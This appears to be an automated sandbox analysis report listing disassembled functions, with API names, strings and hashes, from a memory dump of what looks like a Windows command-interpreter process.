                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcscmp
                                        • String ID: *.*$????????.???
                                        • API String ID: 3392835482-3870530610
                                        • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                        • Instruction ID: b510f3ddd91d3c0773f6e3389b0ec29f46dde850ee54a0ebf3f1d114e21aa9b8
                                        • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                        • Instruction Fuzzy Hash: E811E525B1CE6281E764AF2BB441939F3A6FB44B90F985030CF9D47B85EE3DE5818710
                                        Function 00007FF7CD4A9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: fprintf
                                        • String ID: CMD Internal Error %s$%s$Null environment
                                        • API String ID: 383729395-2781220306
                                        • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                        • Instruction ID: 50b576ab4bedeef853e7e74eb5984fe59c0752c72afde726add6f133b2b8de00
                                        • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                        • Instruction Fuzzy Hash: 5A118F31B0CA4291FA55AF15E9040B9A2A1EB587B0FC45332DF7D432D4FF2CEA418360
                                        Function 00007FF7CD4909F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswspacewcschr
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                        • API String ID: 287713880-1183017076
                                        • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                        • Instruction ID: b7efc4017dc269c29ddbef636ca25c6b8138cdea264dc1b13fef2da7e4e9e431
                                        • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                        • Instruction Fuzzy Hash: 84F0A421B1CA5293EA609F43A400579F7A6FF65F62BC99130DF6D02244FF3DE540C660
                                        Function 00007FF7CD4904F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                        • API String ID: 1646373207-2530943252
                                        • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                        • Instruction ID: f47c4be1510fd17cbc65e7a4d46f09641c72deaa594ab017a83cb7fdce343b56
                                        • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                        • Instruction Fuzzy Hash: 9501E921B0DE02A2EA48EF52A851538A7A5EF59771BC44775CE3E023E0FE7D66918320
                                        Function 00007FF7CD4A73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: RaiseFailFastException$kernelbase.dll
                                        • API String ID: 1646373207-919018592
                                        • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                        • Instruction ID: 9d8b55284a52fdf013d98c34c9c698aa41f811aa91f094626bc2733b57c20f71
                                        • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                        • Instruction Fuzzy Hash: 54F01721B1CA91A2EA40AF52F448069FA61EB99BE0B889175DE5E03B14EF3CD685C710
                                        Function 00007FF7CD481130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$CurrentDirectorytowupper
                                        • String ID:
                                        • API String ID: 1403193329-0
                                        • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                        • Instruction ID: b35f092bc07e7b3c51f9b3d0cd851833149c0d96748d11f37854b9c1e16bfc55
                                        • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                        • Instruction Fuzzy Hash: 7761C132B08B828AE710EF61D8446ADB7A5FB847A8F904136DF6D53699EF38D640C710
                                        Function 00007FF7CD494878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmp$wcschr
                                        • String ID:
                                        • API String ID: 3270668897-0
                                        • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                        • Instruction ID: ef2fc67d21614687dd396adc0caa2ec982cdd35625fd4b8f4cd21004fcdba8cd
                                        • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                        • Instruction Fuzzy Hash: B3517111F0D64291EA60BF22D410979E7A6EF55BA0FD88135CF6E072D5FE2CEA418360
                                        Function 00007FF7CD4AF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveFullNamePathType
                                        • String ID:
                                        • API String ID: 3442494845-0
                                        • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                        • Instruction ID: 371853f8f752edc6a99883ffc1772414e8a2385cd742e415afdebade4603341a
                                        • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                        • Instruction Fuzzy Hash: 0C317932709B828AEB60AF61E8447E9B3A5FB88B94F844025EF5D47B54EF38D605C710
                                        Function 00007FF7CD498F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                        • Instruction ID: 2a10a0badf7f627fdb0fd9e433cab293928ceba469adc2c3da502a6ae110a58e
                                        • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                        • Instruction Fuzzy Hash: 8941E435B0CF4191EA48AF49F880365B368FB98764F9050B6DEAE42764EF3DE644C720
                                        Function 00007FF7CD498470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcstol$lstrcmp
                                        • String ID:
                                        • API String ID: 3515581199-0
                                        • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                        • Instruction ID: 5648928adc74e93c44f448e3c1522697f1fd4e04fddf8c685bec59002a3a633a
                                        • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                        • Instruction Fuzzy Hash: 1F21D232B0C64283E6616F7EA09493AEBA9FF4D770F815134CF5F02655EE6CE6448620
                                        Function 00007FF7CD484F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$TimeWrite
                                        • String ID:
                                        • API String ID: 4019809305-0
                                        • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                        • Instruction ID: 8c2987a33f4ad16d0e41c7f1ed0827a9925a8b7786bfeff71e0fcfc44231a1aa
                                        • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                        • Instruction Fuzzy Hash: D9318F22B0CA4287E7A06F159484239E6A5BB59B70F846238DF2D42BD5EF3CDA449610
                                        Function 00007FF7CD4B1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveNamePathTypeVolume
                                        • String ID:
                                        • API String ID: 1029679093-0
                                        • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                        • Instruction ID: 4edc39b6fa9ec2aee8f8d478ff6db73eae28b21aa05c728b76ea854f11a2de15
                                        • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                        • Instruction Fuzzy Hash: 37316B32709AC18AEB209F62D8953E8B7A5FB49B94F844035CF5D87748EF38D649C710
                                        Function 00007FF7CD4AE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                        • String ID:
                                        • API String ID: 2448200120-0
                                        • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                        • Instruction ID: de0cdfddb6c19985437f75d4ceec3254e72ccf41e471b1ce28bbb60f28e825b3
                                        • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                        • Instruction Fuzzy Hash: DA211C31B0CA468AE7147F12A40057DFAA1EB84BA1F854139DE7D47795EF3CE6418B20
                                        Function 00007FF7CD497CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                        • Instruction ID: 97434cfea32ee6921b9a0b44e5cab515de7bddd2fd50f8df87412eadeadcd070
                                        • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                        • Instruction Fuzzy Hash: E421536170CB4186EE44AF52B914479F7A2EB89BE0B989230DF2E03755EE3CE5058720
                                        Function 00007FF7CD486A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD493C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD493D0C
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D2F
                                          • Part of subcall function 00007FF7CD493C24: iswalpha.MSVCRT ref: 00007FF7CD493D4F
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D75
                                          • Part of subcall function 00007FF7CD493C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493DBF
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486ABF
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486AD3
                                          • Part of subcall function 00007FF7CD486B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B8B
                                          • Part of subcall function 00007FF7CD486B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B97
                                          • Part of subcall function 00007FF7CD486B84: RtlFreeHeap.NTDLL ref: 00007FF7CD486BAF
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B39
                                          • Part of subcall function 00007FF7CD486B30: RtlFreeHeap.NTDLL ref: 00007FF7CD486B4D
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B59
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486B03
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486B17
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                        • String ID:
                                        • API String ID: 3512109576-0
                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
